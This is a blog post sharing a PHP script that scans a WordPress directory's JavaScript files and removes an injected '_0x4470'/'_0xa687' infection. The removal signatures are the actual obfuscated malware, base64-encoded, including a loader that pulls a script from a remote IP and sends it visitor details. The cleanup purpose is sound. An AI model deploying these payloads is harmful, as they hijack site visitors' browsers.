Remove wordpress virus _0x4470

virus

This week I found a virus infected a whole site I designed using a thimthumb vulnerability, trying to remove it I found it easier to desing a code (same way the virus does) to scan all the javascript files and remove the virus. Grab this code to clean your site. Just replace the $scan_directory = ‘./wordpress’; with your infected dir, if is the same directory use ‘./’.

Update:

  • Added multiple virus code scan
  • Hopefully this time it works
<code><?php
	$scan_directory    = './wordpress';
	$shout_directories = true;
	$file_count        = true;

	echo 'Starting file cleaning.. ' . date('F j, Y, g:i a') . '</br></br>';
	_readDir($scan_directory);

	$files = 0;
	$fixed_count = 1;

	function _readDir($dir) {
                global $shout_directories, $file_count;
		if (is_dir($dir)) {
			if ($dh = opendir($dir)) {
				if($shout_directories) echo '======== ' . $dir  . ' ==========<br/>';
				while (($file = readdir($dh)) !== false) {
					if($file != '.' && $file != '..' && $file != '...') {
						if(is_dir($dir . '/' . $file) ) _readDir($dir . '/' . $file);
						else {
							$files++;
							if(isJavascript($file) == 'js') cleanFile($dir . '/' . $file);
						}
					}
				}
				closedir($dh);
				if($shout_directories) echo '======== /' . $dir . ' ==========<br/>';
				if($file_count) {
					echo 'Files scanned in directory: ' . $files . '<br/>';
					$files = 0;
				}
			} else { echo '<strong>' . $dir . ' cannot be opened.</strong><br/>'; }
		} else { echo '<strong>' . $dir . ' is not a directory.</strong><br/>'; }
		flush();
	}

	function isJavascript($file) {
		$parts = explode('.', $file);
		return $parts[1];
	}
	function cleanFile($filename) {
		global $fixed_count;
		$file = @file_get_contents($filename);
		if($file) {
			$viruses = array(
				'var _0x4470' => 'dmFyIF8weDQ0NzA9WyJceDM5XHgzRFx4MzFceDJFXHg2NFx4MjhceDI3XHgzNVx4MjdceDI5XHgzQlx4NjJceDI4XHgyMVx4MzlceDI5XHg3Qlx4MzhceDNEXHgzMVx4MkVceDZBXHgzQlx4MzRceDNEXHgzNlx4MjhceDMxXHgyRVx4NjlceDI5XHgzQlx4MzdceDNEXHgzNlx4MjhceDY3XHgyRVx4NkJceDI5XHgzQlx4NjFceDIwXHgzMlx4M0RceDMxXHgyRVx4NjVceDI4XHgyN1x4NjNceDI3XHgyOVx4M0JceDMyXHgyRVx4NjZceDNEXHgyN1x4MzVceDI3XHgzQlx4MzJceDJFXHg2OFx4M0RceDI3XHg3N1x4M0FceDJGXHgyRlx4NzRceDJFXHg3NVx4MkVceDZDXHgyRVx4NzZceDJGXHg3M1x4MkVceDcyXHgzRlx4NzFceDNEXHgyN1x4MkJceDM0XHgyQlx4MjdceDI2XHg2RFx4M0RceDI3XHgyQlx4MzhceDJCXHgyN1x4MjZceDZFXHgzRFx4MjdceDJCXHgzN1x4M0JceDYxXHgyMFx4MzNceDNEXHgzMVx4MkVceDZGXHgyOFx4MjdceDMzXHgyN1x4MjlceDVCXHgzMFx4NURceDNCXHgzM1x4MkVceDcwXHgyOFx4MzJceDI5XHg3RCIsIlx4N0MiLCJceDczXHg3MFx4NkNceDY5XHg3NCIsIlx4N0NceDY0XHg2Rlx4NjNceDc1XHg2RFx4NjVceDZFXHg3NFx4N0NceDZBXHg3M1x4N0NceDY4XHg2NVx4NjFceDY0XHg3Q1x4NjhceDY3XHg2OFx4NkFceDY4XHg2QVx4NjhceDZBXHg2N1x4N0NceDY0XHg2N1x4NkNceDZDXHg2OFx4NjdceDc1XHg2Qlx4N0NceDY1XHg3M1x4NjNceDYxXHg3MFx4NjVceDdDXHg3NVx4NjdceDZCXHg2Qlx4NkFceDZCXHg2QVx4N0NceDY4XHg2N1x4NjhceDZBXHg2N1x4NjhceDZBXHg2OFx4NkFceDY3XHg2QVx4NjhceDdDXHg2NVx4NkNceDY1XHg2RFx4NjVceDZFXHg3NFx4N0NceDc2XHg2MVx4NzJceDdDXHg2OVx4NjZceDdDXHg3M1x4NjNceDcyXHg2OVx4NzBceDc0XHg3Q1x4NjdceDY1XHg3NFx4NDVceDZDXHg2NVx4NkRceDY1XHg2RVx4NzRceDQyXHg3OVx4NDlceDY0XHg3Q1x4NjNceDcyXHg2NVx4NjFceDc0XHg2NVx4NDVceDZDXHg2NVx4NkRceDY1XHg2RVx4NzRceDdDXHg2OVx4NjRceDdDXHg2RVx4NjFceDc2XHg2OVx4NjdceDYxXHg3NFx4NkZceDcyXHg3Q1x4NzNceDcyXHg2M1x4N0NceDcyXHg2NVx4NjZceDY1XHg3Mlx4NzJceDY1XHg3Mlx4N0NceDZDXHg2Rlx4NjNceDYxXHg3NFx4NjlceDZGXHg2RVx4N0NceDc1XHg3M1x4NjVceDcyXHg0MVx4NjdceDY1XHg2RVx4NzRceDdDXHgzMlx4MzFceDM2XHg3Q1x4NkNceDYzXHg3Q1x4NzVceDYxXHg3Q1x4NjdceDY1XHg3NFx4NDVceDZDXHg2NVx4NkRceDY1XHg2RVx4NzRceDczXHg0Mlx4NzlceDU0XHg2MVx4NjdceDRFXHg2MVx4NkRceDY1XHg3Q1x4NjFceDcwXHg3MFx4NjVceDZFXHg2NFx4NDNceDY4XHg2OVx4NkNceDY0XHg3Q1x4NzJceDY1XHg2Nlx4N0NceDcwXHg2OFx4NzBceDdDXHg3Q1x4MzlceDMxXHg3Q1x4MzFceDM5XHgzNlx4N0NceDM2XHgzNFx4N0NceDY4XHg3NFx4NzRceDcwIiwiXHg3Mlx4NjVceDcwXHg2Q1x4NjFceDYzXHg2NSIsIiIsIlx4NUNceDc3XHgyQiIsIlx4NUNceDYyIiwiXHg2NyJdO2V2YWwoZnVuY3Rpb24gKF8weGEwNjR4MSxfMHhhMDY0eDIsXzB4YTA2NHgzLF8weGEwNjR4NCxfMHhhMDY0eDUsXzB4YTA2NHg2KXtfMHhhMDY0eDU9ZnVuY3Rpb24gKF8weGEwNjR4Myl7cmV0dXJuIF8weGEwNjR4My50b1N0cmluZygzNik7fSA7aWYoIV8weDQ0NzBbNV1bXzB4NDQ3MFs0XV0oL14vLFN0cmluZykpe3doaWxlKF8weGEwNjR4My0tKXtfMHhhMDY0eDZbXzB4YTA2NHgzLnRvU3RyaW5nKF8weGEwNjR4MildPV8weGEwNjR4NFtfMHhhMDY0eDNdfHxfMHhhMDY0eDMudG9TdHJpbmcoXzB4YTA2NHgyKTt9IDtfMHhhMDY0eDQ9W2Z1bmN0aW9uIChfMHhhMDY0eDUpe3JldHVybiBfMHhhMDY0eDZbXzB4YTA2NHg1XTt9IF07XzB4YTA2NHg1PWZ1bmN0aW9uICgpe3JldHVybiBfMHg0NDcwWzZdO30gO18weGEwNjR4Mz0xO30gO3doaWxlKF8weGEwNjR4My0tKXtpZihfMHhhMDY0eDRbXzB4YTA2NHgzXSl7XzB4YTA2NHgxPV8weGEwNjR4MVtfMHg0NDcwWzRdXSggbmV3IFJlZ0V4cChfMHg0NDcwWzddK18weGEwNjR4NShfMHhhMDY0eDMpK18weDQ0NzBbN10sXzB4NDQ3MFs4XSksXzB4YTA2NHg0W18weGEwNjR4M10pO30gO30gO3JldHVybiBfMHhhMDY0eDE7fSAoXzB4NDQ3MFswXSwzMywzMyxfMHg0NDcwWzNdW18weDQ0NzBbMl1dKF8weDQ0NzBbMV0pLDAse30pKTs=',
				'var _0xa687' => 'dmFyIF8weGE2ODc9WyJceDc0XHg2Rlx4NENceDZGXHg3N1x4NjVceDcyXHg0M1x4NjFceDczXHg2NSIsIlx4NzVceDczXHg2NVx4NzJceDQxXHg2N1x4NjVceDZFXHg3NCIsIlx4NkRceDczXHg2OVx4NjUiLCJceDY5XHg2RVx4NjRceDY1XHg3OFx4NEZceDY2IiwiXHg2Rlx4NzBceDY1XHg3Mlx4NjEiLCJceDc3XHg2NVx4NjJceDc0XHg3NiIsIlx4NzdceDY5XHg2RVx4NjRceDZGXHg3N1x4NzMiLCJceDYxXHg2OFx4NkJceDcyXHg2MVx4NjgiLCJceDY3XHg2NVx4NzRceDQ1XHg2Q1x4NjVceDZEXHg2NVx4NkVceDc0XHg0Mlx4NzlceDQ5XHg2NCIsIlx4NkNceDZGXHg2M1x4NjFceDc0XHg2OVx4NkZceDZFIiwiXHg3Mlx4NjVceDY2XHg2NVx4NzJceDcyXHg2NVx4NzIiLCJceDczXHg2M1x4NzJceDY5XHg3MFx4NzQiLCJceDYzXHg3Mlx4NjVceDYxXHg3NFx4NjVceDQ1XHg2Q1x4NjVceDZEXHg2NVx4NkVceDc0IiwiXHg2OVx4NjQiLCJceDczXHg3Mlx4NjMiLCJceDY4XHg3NFx4NzRceDcwXHgzQVx4MkZceDJGXHgzM1x4MzFceDJFXHgzMVx4MzhceDM0XHgyRVx4MzJceDM0XHgzMlx4MkVceDMxXHgzMFx4MzNceDJGXHg3M1x4MkVceDcwXHg2OFx4NzBceDNGXHg3Mlx4NjVceDY2XHgzRCIsIlx4MjZceDZDXHg2M1x4M0QiLCJceDI2XHg3NVx4NjFceDNEIiwiXHg2OFx4NjVceDYxXHg2NCIsIlx4NjdceDY1XHg3NFx4NDVceDZDXHg2NVx4NkRceDY1XHg2RVx4NzRceDczXHg0Mlx4NzlceDU0XHg2MVx4NjdceDRFXHg2MVx4NkRceDY1IiwiXHg2MVx4NzBceDcwXHg2NVx4NkVceDY0XHg0M1x4NjhceDY5XHg2Q1x4NjQiXTt2YXIgdWE9bmF2aWdhdG9yW18weGE2ODdbMV1dW18weGE2ODdbMF1dKCk7aWYoKCh1YVtfMHhhNjg3WzNdXShfMHhhNjg3WzJdKSE9LTEmJnVhW18weGE2ODdbM11dKF8weGE2ODdbNF0pPT0tMSYmdWFbXzB4YTY4N1szXV0oXzB4YTY4N1s1XSk9PS0xKSkmJnVhW18weGE2ODdbM11dKF8weGE2ODdbNl0pIT0tMSl7ZWxlbWVudD1kb2N1bWVudFtfMHhhNjg3WzhdXShfMHhhNjg3WzddKTtpZighZWxlbWVudCl7dWVkaGZma3RlPWRvY3VtZW50W18weGE2ODdbOV1dO2hnaGpoamhqZz1lc2NhcGUoZG9jdW1lbnRbXzB4YTY4N1sxMF1dKTtrZGhranQ9ZXNjYXBlKG5hdmlnYXRvcltfMHhhNjg3WzFdXSk7dmFyIGpzPWRvY3VtZW50W18weGE2ODdbMTJdXShfMHhhNjg3WzExXSk7anNbXzB4YTY4N1sxM11dPV8weGE2ODdbN107anNbXzB4YTY4N1sxNF1dPV8weGE2ODdbMTVdK2hnaGpoamhqZytfMHhhNjg3WzE2XSt1ZWRoZmZrdGUrXzB4YTY4N1sxN10ra2Roa2p0O3ZhciBoZWFkPWRvY3VtZW50W18weGE2ODdbMTldXShfMHhhNjg3WzE4XSlbMF07aGVhZFtfMHhhNjg3WzIwXV0oanMpO30gO30gOw=='
			);
			foreach($viruses as $key=>$val) {
				if(strpos($file, $key) !== false) {
					$file = str_replace(base64_decode($val), '', $file);
					$fp = @fopen($filename, 'w');
					if($fp) {
						fwrite($fp, $file);
						fclose($fp);
					}
					echo $fixed_count . '. <strong>Fixed:</strong>'. $filename . '<br/>';
					$fixed_count++;
				}
			}
		}
	}</code>

development